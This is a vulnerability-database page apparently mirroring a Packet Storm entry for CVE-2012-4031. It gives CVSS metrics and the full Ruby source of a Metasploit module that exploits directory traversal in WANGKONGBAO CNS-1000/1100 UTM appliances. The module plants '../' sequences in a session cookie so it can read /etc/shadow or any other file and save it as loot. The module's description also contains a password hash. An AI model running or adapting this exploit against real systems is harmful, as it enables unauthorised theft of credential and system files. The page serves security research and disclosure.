Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormDillon Beresford, metasploit.comPACKETSTORM:181173
HistorySep 01, 2024 - 12:00 a.m.

WANGKONGBAO CNS-1000 And 1100 UTM Directory Traversal

2024-09-0100:00:00
Dillon Beresford, metasploit.com
packetstormsecurity.com
14
wangkongbao
cns-1000
1100
directory traversal
vulnerability
apache server
root access
file retrieval
exploit
metasploit
remote code execution

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

7.1

Confidence

Low

EPSS

0.157

Percentile

96.0%

JSON
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Scanner  
  
def initialize(info={})  
super(update_info(info,  
'Name' => 'WANGKONGBAO CNS-1000 and 1100 UTM Directory Traversal',  
'Description' => %q{  
This module exploits the WANGKONGBAO CNS-1000 and 1100 UTM appliances aka  
Network Security Platform. This directory traversal vulnerability is interesting  
because the apache server is running as root, this means we can grab anything we  
want! For instance, the /etc/shadow and /etc/passwd files for the special  
kfc:$1$SlSyHd1a$PFZomnVnzaaj3Ei2v1ByC0:15488:0:99999:7::: user  
},  
'References' =>  
[  
['CVE', '2012-4031'],  
['EDB', '19526']  
],  
'Author' =>  
[  
'Dillon Beresford'  
],  
'License' => MSF_LICENSE  
))  
  
register_options(  
[  
Opt::RPORT(85),  
OptString.new('FILEPATH', [false, 'The name of the file to download', '/etc/shadow']),  
OptInt.new('DEPTH', [true, 'Traversal depth', 10])  
])  
end  
  
def run_host(ip)  
# No point to continue if no filename is specified  
if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?  
print_error("Please supply the name of the file you want to download")  
return  
end  
  
travs = "../" * datastore['DEPTH']  
travs = travs[0,travs.rindex('/')]  
  
# Create request  
res = send_request_raw({  
'method' => 'GET',  
'uri' => "/src/acloglogin.php",  
'headers' =>  
{  
'Connection' => "keep-alive",  
'Accept-Encoding' => "zip,deflate",  
'Cookie' => "PHPSESSID=af0402062689e5218a8bdad17d03f559; lang=owned" + travs + datastore['FILEPATH'] + "/."*4043  
},  
}, 25)  
  
print_good "File retrieved successfully"  
  
# Show data if needed  
if res and res.code == 200  
vprint_line(res.to_s)  
fname = File.basename(datastore['FILEPATH'])  
  
path = store_loot(  
'cns1000utm.http',  
'application/octet-stream',  
ip,  
res.body,  
fname  
)  
print_status("File saved in: #{path}")  
else  
print_error("Nothing was downloaded")  
end  
end  
end  
`

Related

cvelist 1
metasploit 1
cve 1
prion 1
nvd 1
exploitdb 1
cvelist
cvelist
CVE-2012-4031
2012-07-17 21:00:00
metasploit
metasploit
WANGKONGBAO CNS-1000 and 1100 UTM Directory Traversal
2012-07-06 05:54:55
cve
cve
CVE-2012-4031
2012-07-17 21:55:02
prion
prion
Directory traversal
2012-07-17 21:55:00
nvd
nvd
CVE-2012-4031
2012-07-17 21:55:02
exploitdb
exploitdb
WANGKONGBAO CNS-1000 UTM IPS-FW - Directory Traversal (Metasploit)
2012-07-02 00:00:00

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

7.1

Confidence

Low

EPSS

0.157

Percentile

96.0%

JSON
Related for PACKETSTORM:181173
cvelist1metasploit1cve1prion1nvd1exploitdb1